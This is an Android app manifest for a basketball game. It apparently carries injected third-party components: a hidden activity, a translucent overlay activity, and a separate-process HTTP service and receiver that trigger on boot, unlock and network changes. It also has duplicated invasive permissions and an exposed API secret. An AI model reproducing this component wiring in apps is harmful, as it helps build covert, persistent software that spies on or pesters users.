<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:installLocation="auto" package="com.droidhen.basketballfwefs">
    <supports-screens android:anyDensity="true" android:largeScreens="false" android:normalScreens="true" android:smallScreens="false" android:xlargeScreens="false"/>
    <compatible-screens>
        <screen android:screenDensity="ldpi" android:screenSize="normal"/>
        <screen android:screenDensity="mdpi" android:screenSize="normal"/>
        <screen android:screenDensity="hdpi" android:screenSize="normal"/>
        <screen android:screenDensity="xhdpi" android:screenSize="normal"/>
    </compatible-screens>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.RECEIVE_USER_PRESENT"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.RECEIVE_USER_PRESENT"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <application android:icon="@drawable/icon" android:installLocation="auto" android:label="@string/app_name" android:name="GameApplication">
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:label="@string/app_name" android:launchMode="singleTask" android:name="com.droidhen.basketballfwefs.GameActivity" android:screenOrientation="portrait"/>
        <activity android:label="@string/app_name" android:name="com.common.StarterActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.common.EntryActivity" android:noHistory="true"/>
        <meta-data android:name="next_activity_name" android:value="com.droidhen.basketballfwefs.GameActivity"/>
        <meta-data android:name="UMENG_APPKEY" android:value="51e5e44656240b922b01a8f7"/>
        <meta-data android:name="UMENG_CHANNEL" android:value="anzhi_60"/>
        <activity android:excludeFromRecents="true" android:label="" android:name="com.miller.ps.Zhoua" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </activity>
        <receiver android:name="com.miller.ps.Zhour">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:launchMode="singleInstance" android:name="com.miller.is.Wua" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <service android:exported="false" android:name="com.test.httputil.HttpUtilService" android:process=":remote">
            <meta-data android:name="cfrom" android:value="19"/>
            <meta-data android:name="str" android:value="http://m.baidu.com/baidu.php"/>
        </service>
        <receiver android:exported="true" android:name="com.test.httputil.HttpUtilReceiver">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
            </intent-filter>
        </receiver>
        <activity android:configChanges="orientation" android:label="@string/app_title_options" android:name=".OptionActivity" android:screenOrientation="portrait"/>
        <activity android:configChanges="keyboard|keyboardHidden|orientation|screenLayout|screenSize|smallestScreenSize|uiMode" android:name="com.google.ads.AdActivity"/>
        <activity android:name="com.droidhen.api.promptclient.prompt.RateActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.Dialog"/>
        <provider android:authorities="com.droidhen.basketballfwefs.ScoreClient" android:name="com.droidhen.api.scoreclient.ScoreClientProvider"/>
        <activity android:configChanges="orientation" android:name="com.droidhen.api.scoreclient.ui.HighScoresActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.NoTitleBar.Fullscreen"/>
        <activity android:configChanges="orientation" android:name="com.droidhen.api.scoreclient.ui.AchievementListActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.NoTitleBar.Fullscreen"/>
        <activity android:name="com.moreexchange.activity.AppCatalog" android:screenOrientation="portrait"/>
        <receiver android:exported="true" android:name="com.moreexchange.receiver.InstallReferrerReceiver">
            <intent-filter>
                <action android:name="com.android.vending.INSTALL_REFERRER"/>
            </intent-filter>
        </receiver>
        <meta-data android:name="MORE_EXCHANGE_KEY" android:value="799401d945d696b796b17afda703acfb"/>
        <meta-data android:name="MORE_EXCHANGE_SECRET" android:value="88ca6dddb2a19901191169533e8fdcdf8c2af70b"/>
    </application>
</manifest>
